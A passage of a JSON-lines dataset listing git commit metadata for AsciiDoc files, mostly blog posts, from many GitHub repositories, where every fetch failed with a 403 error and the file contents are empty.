2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b9cab15d31ef129fd8c9578c0f00b797b393c74","subject":"Update 2017-03-27-O-Jogo-Mah-Rocks.adoc","message":"Update 2017-03-27-O-Jogo-Mah-Rocks.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-03-27-O-Jogo-Mah-Rocks.adoc","new_file":"_posts\/2017-03-27-O-Jogo-Mah-Rocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd11165255ae08a104cb605e07ba44d2f0e27020","subject":"Update 2016-01-13-titre4.adoc","message":"Update 2016-01-13-titre4.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-01-13-titre4.adoc","new_file":"_posts\/2016-01-13-titre4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69d4452c72057b7665531ffc8c9fce61d69af0eb","subject":"Publish 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","message":"Publish 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_file":"2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23d96c0662c797ecfff168226bd77116737a8b7c","subject":"y2b create post Unboxing Preview","message":"y2b create post Unboxing Preview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-19-Unboxing-Preview.adoc","new_file":"_posts\/2012-01-19-Unboxing-Preview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"186c16ffa8eca0f8be43e45fa28328c61c33987c","subject":"Update 2016-06-11-Title.adoc","message":"Update 2016-06-11-Title.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2016-06-11-Title.adoc","new_file":"_posts\/2016-06-11-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysaumont\/pysaumont.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"657693015d87ad572ee49610842fa30f6da1ae48","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c067c4ea0bf99098bc6b376625b40e89862d28fd","subject":"Update 2015-09-09-Acamica-La-mejor-plataforma-de-educacion-online-gratuita-y-en-espanol.adoc","message":"Update 2015-09-09-Acamica-La-mejor-plataforma-de-educacion-online-gratuita-y-en-espanol.adoc","repos":"AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-09-09-Acamica-La-mejor-plataforma-de-educacion-online-gratuita-y-en-espanol.adoc","new_file":"_posts\/2015-09-09-Acamica-La-mejor-plataforma-de-educacion-online-gratuita-y-en-espanol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlonsoCampos\/AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7031dc73897733cc713171effdce8e96380bd2cf","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaa8264c745e66bee712c02f250643ff71360d8e","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"219fa37263cb12467bfa38013d560195b3174a35","subject":"Start on README for CP1 DB","message":"Start on README for CP1 DB\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"workflows\/cp1\/db\/README.adoc","new_file":"workflows\/cp1\/db\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"88760d54185c0610d0e322266538056b9c14a863","subject":"Update 2016-04-04-Testblog.adoc","message":"Update 2016-04-04-Testblog.adoc","repos":"soyabeen\/soyabeen.github.io,soyabeen\/soyabeen.github.io,soyabeen\/soyabeen.github.io,soyabeen\/soyabeen.github.io","old_file":"_posts\/2016-04-04-Testblog.adoc","new_file":"_posts\/2016-04-04-Testblog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soyabeen\/soyabeen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0780e14aba27e5ba37b8b5e92c3c04780bf62c8","subject":"Update 2016-11-15-231000-Thursday.adoc","message":"Update 2016-11-15-231000-Thursday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-15-231000-Thursday.adoc","new_file":"_posts\/2016-11-15-231000-Thursday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37691c2d64dd8d0c86a277124192feefd0056146","subject":"Update 2019-03-12-A-B-Java-Script.adoc","message":"Update 2019-03-12-A-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a7a36698cb0a9060d5cb50ba25cbffeb818e5cf","subject":"Update 2018-04-30-the-Constitution-of-Holacracy-in-Japanese-Article-1.adoc","message":"Update 2018-04-30-the-Constitution-of-Holacracy-in-Japanese-Article-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-30-the-Constitution-of-Holacracy-in-Japanese-Article-1.adoc","new_file":"_posts\/2018-04-30-the-Constitution-of-Holacracy-in-Japanese-Article-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f09ce267b361b837b8960b168e34dcb2780f5a57","subject":"Polish MVC doc","message":"Polish MVC 
doc\n","repos":"wilkinsona\/spring-security,SanjayUser\/SpringSecurityPro,djechelon\/spring-security,mdeinum\/spring-security,spring-projects\/spring-security,chinazhaoht\/spring-security,Peter32\/spring-security,jgrandja\/spring-security,xingguang2013\/spring-security,adairtaosy\/spring-security,hippostar\/spring-security,xingguang2013\/spring-security,follow99\/spring-security,wilkinsona\/spring-security,tekul\/spring-security,rwinch\/spring-security,zhaoqin102\/spring-security,caiwenshu\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,kazuki43zoo\/spring-security,raindev\/spring-security,Krasnyanskiy\/spring-security,caiwenshu\/spring-security,fhanik\/spring-security,forestqqqq\/spring-security,mrkingybc\/spring-security,mparaz\/spring-security,liuguohua\/spring-security,vitorgv\/spring-security,pwheel\/spring-security,thomasdarimont\/spring-security,izeye\/spring-security,rwinch\/spring-security,mrkingybc\/spring-security,forestqqqq\/spring-security,yinhe402\/spring-security,liuguohua\/spring-security,SanjayUser\/SpringSecurityPro,ollie314\/spring-security,follow99\/spring-security,eddumelendez\/spring-security,Peter32\/spring-security,Peter32\/spring-security,pkdevbox\/spring-security,likaiwalkman\/spring-security,ollie314\/spring-security,chinazhaoht\/spring-security,ajdinhedzic\/spring-security,eddumelendez\/spring-security,Xcorpio\/spring-security,olezhuravlev\/spring-security,jmnarloch\/spring-security,jmnarloch\/spring-security,zshift\/spring-security,adairtaosy\/spring-security,panchenko\/spring-security,zgscwjm\/spring-security,wilkinsona\/spring-security,ractive\/spring-security,zshift\/spring-security,mparaz\/spring-security,hippostar\/spring-security,olezhuravlev\/spring-security,vitorgv\/spring-security,caiwenshu\/spring-security,fhanik\/spring-security,izeye\/spring-security,thomasdarimont\/spring-security,MatthiasWinzeler\/spring-security,kazuki43zoo\/spring-security,pwheel\/spring-security,wkorando\/spring-security,pwheel\/spring-security,pwheel\/spring-security,Xcorpio\/spring-security,cyratech\/spring-security,adairtaosy\/spring-security,vitorgv\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,follow99\/spring-security,spring-projects\/spring-security,Xcorpio\/spring-security,raindev\/spring-security,jmnarloch\/spring-security,cyratech\/spring-security,pwheel\/spring-security,driftman\/spring-security,MatthiasWinzeler\/spring-security,mrkingybc\/spring-security,rwinch\/spring-security,chinazhaoht\/spring-security,mparaz\/spring-security,chinazhaoht\/spring-security,hippostar\/spring-security,MatthiasWinzeler\/spring-security,mounb\/spring-security,fhanik\/spring-security,mparaz\/spring-security,olezhuravlev\/spring-security,mdeinum\/spring-security,djechelon\/spring-security,wilkinsona\/spring-security,yinhe402\/spring-security,SanjayUser\/SpringSecurityPro,izeye\/spring-security,diegofernandes\/spring-security,ollie314\/spring-security,Krasnyanskiy\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,kazuki43zoo\/spring-security,ajdinhedzic\/spring-security,zhaoqin102\/spring-security,izeye\/spring-security,yinhe402\/spring-security,eddumelendez\/spring-security,Krasnyanskiy\/spring-security,spring-projects\/spring-security,raindev\/spring-security,fhanik\/spring-security,ajdinhedzic\/spring-security,ajdinhedzic\/spring-security,thomasdarimont\/spring-security,jgrandja\/spring-security,eddumelendez\/spring-security,zshift\/spring-security,panchenko\/spring-security,spring-projects\/spring-security,xingguang2013\/
spring-security,wkorando\/spring-security,djechelon\/spring-security,tekul\/spring-security,driftman\/spring-security,mdeinum\/spring-security,mounb\/spring-security,kazuki43zoo\/spring-security,tekul\/spring-security,jmnarloch\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,diegofernandes\/spring-security,zgscwjm\/spring-security,Xcorpio\/spring-security,ollie314\/spring-security,Peter32\/spring-security,ractive\/spring-security,likaiwalkman\/spring-security,rwinch\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,vitorgv\/spring-security,forestqqqq\/spring-security,pkdevbox\/spring-security,rwinch\/spring-security,rwinch\/spring-security,diegofernandes\/spring-security,forestqqqq\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,SanjayUser\/SpringSecurityPro,zhaoqin102\/spring-security,follow99\/spring-security,mounb\/spring-security,mrkingybc\/spring-security,spring-projects\/spring-security,ractive\/spring-security,olezhuravlev\/spring-security,MatthiasWinzeler\/spring-security,raindev\/spring-security,jgrandja\/spring-security,panchenko\/spring-security,kazuki43zoo\/spring-security,zhaoqin102\/spring-security,pkdevbox\/spring-security,pkdevbox\/spring-security,zshift\/spring-security,likaiwalkman\/spring-security,cyratech\/spring-security,cyratech\/spring-security,wkorando\/spring-security,caiwenshu\/spring-security,hippostar\/spring-security,driftman\/spring-security,fhanik\/spring-security,mounb\/spring-security,wkorando\/spring-security,diegofernandes\/spring-security,adairtaosy\/spring-security,likaiwalkman\/spring-security,liuguohua\/spring-security,xingguang2013\/spring-security,liuguohua\/spring-security,Krasnyanskiy\/spring-security,zgscwjm\/spring-security,ractive\/spring-security,zgscwjm\/spring-security,yinhe402\/spring-security,eddumelendez\/spring-security,tekul\/spring-security,thomasdarimont\/spring-security,driftman\/spring-security,panchenko\/spring-security","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1073a35b59dc2b8f26972e952e8d417faabdc1df","subject":"Update 2015-11-02-Second-post-test.adoc","message":"Update 2015-11-02-Second-post-test.adoc","repos":"csiebler\/hubpress-test,csiebler\/hubpress-test,csiebler\/hubpress-test","old_file":"_posts\/2015-11-02-Second-post-test.adoc","new_file":"_posts\/2015-11-02-Second-post-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/csiebler\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08b49225fc97492978ed96bbb0979bc8f36cc50a","subject":"Update 2017-05-28-Case-expressions.adoc","message":"Update 2017-05-28-Case-expressions.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-28-Case-expressions.adoc","new_file":"_posts\/2017-05-28-Case-expressions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdb4377762f2d890af23a245f26257f9eca19e36","subject":"Update 
3-3-2017-Matt-Does-Info-Sec.adoc","message":"Update 3-3-2017-Matt-Does-Info-Sec.adoc","repos":"mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io","old_file":"_posts\/3-3-2017-Matt-Does-Info-Sec.adoc","new_file":"_posts\/3-3-2017-Matt-Does-Info-Sec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattdoesinfosec\/mattdoesinfosec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3469437fa366653562288130856bef01e2421bb","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/soviet_union_2_0.adoc","new_file":"content\/writings\/soviet_union_2_0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"de1f2727f4c7b79a04a8c40c6cefd2b4e3073662","subject":"Teste de inclus\u00e3o de documento com Asciidoctor","message":"Teste de inclus\u00e3o de documento com Asciidoctor\n","repos":"BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC","old_file":"MockAlert\/src\/main\/asciidoc\/index.adoc","new_file":"MockAlert\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BD-ITAC\/BD-ITAC.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a2d4abf8eb7ea05306aaded076737d8088ee7d1","subject":"commit","message":"commit\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"jakartaee\/jakartaee-9\/readme.adoc","new_file":"jakartaee\/jakartaee-9\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7343ba3ea4c2d6a0e5fa3c06274350c81176585","subject":"Renamed '_posts\/2017-09-09.adoc' to '_posts\/2017-09-09adoc.adoc'","message":"Renamed '_posts\/2017-09-09.adoc' to '_posts\/2017-09-09adoc.adoc'","repos":"qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io","old_file":"_posts\/2017-09-09adoc.adoc","new_file":"_posts\/2017-09-09adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qu85101522\/qu85101522.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8afd4f3b63401f0e6e668303f815b55b01465ad7","subject":"rule clean up","message":"rule clean up\n","repos":"buschmais\/jqassistant-demo","old_file":"jqassistant\/modules.adoc","new_file":"jqassistant\/modules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/buschmais\/jqassistant-demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fdd11ef3e99852f94c39c157419fa2d58506abb1","subject":"Update 2014-05-11-C-S-S3-Checkbox.adoc","message":"Update 
2014-05-11-C-S-S3-Checkbox.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2014-05-11-C-S-S3-Checkbox.adoc","new_file":"_posts\/2014-05-11-C-S-S3-Checkbox.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56cd63309c941ea147b8e624bd4e522c77e240fa","subject":"Update 2017-05-31-Lists-of-topics.adoc","message":"Update 2017-05-31-Lists-of-topics.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2017-05-31-Lists-of-topics.adoc","new_file":"_posts\/2017-05-31-Lists-of-topics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c993035c8ec0e200cccea14a403f2bdbe672baa","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b7948c975cf9cc8b22b4747ba52c1e36154606c","subject":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","message":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08148bf3bace79a0e6234c0567b8a7c173c7acb8","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/london-clj-sep.adoc","new_file":"content\/events\/2022\/london-clj-sep.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9a4c29545f83bb1dad764622f3fb8d2cb3db457e","subject":"Update 2015-09-23-Story-of-my-Life.adoc","message":"Update 2015-09-23-Story-of-my-Life.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Story-of-my-Life.adoc","new_file":"_posts\/2015-09-23-Story-of-my-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd9d26dfced6bff07e6a2375580fcca0cb993bbd","subject":"Update 
2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ebab367b8a7d450e0c61dd97d2032d4752962ec","subject":"Update 2017-05-19-Stablishing-a-work-flow-of-sorts.adoc","message":"Update 2017-05-19-Stablishing-a-work-flow-of-sorts.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-05-19-Stablishing-a-work-flow-of-sorts.adoc","new_file":"_posts\/2017-05-19-Stablishing-a-work-flow-of-sorts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5af6ae564d080c7c7c77626d88b7b2ec6381eeea","subject":"Change \"REST Verb\" to \"HTTP Verb\" (#34195)","message":"Change \"REST Verb\" to \"HTTP Verb\" (#34195)\n\n","repos":"GlenRSmith\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/reference\/getting-started.asciidoc","new_file":"docs\/reference\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2ac04d82f32ef75bc7376a669d1414b8098a780","subject":"add heart of clojure","message":"add heart of clojure\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/heartofclojure.adoc","new_file":"content\/events\/2019\/heartofclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7e6b99ca889d07f09ed8e28884c0bf14b45e8362","subject":"Update 
2016-04-01-BREAKING-NEWS-Guardians-of-the-Galaxy-confirmed-for-Disneys-Hollywood-Studios.adoc","message":"Update 2016-04-01-BREAKING-NEWS-Guardians-of-the-Galaxy-confirmed-for-Disneys-Hollywood-Studios.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-01-BREAKING-NEWS-Guardians-of-the-Galaxy-confirmed-for-Disneys-Hollywood-Studios.adoc","new_file":"_posts\/2016-04-01-BREAKING-NEWS-Guardians-of-the-Galaxy-confirmed-for-Disneys-Hollywood-Studios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb0e795973f8016e12ea0d07091f76e854f5a7a6","subject":"Update 2017-07-07-Lazy-programmers.adoc","message":"Update 2017-07-07-Lazy-programmers.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-07-07-Lazy-programmers.adoc","new_file":"_posts\/2017-07-07-Lazy-programmers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce11fdd51a7cbebb98d6e406160d23c19c4ebb17","subject":"Fix javadoc link","message":"Fix javadoc link\n","repos":"robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 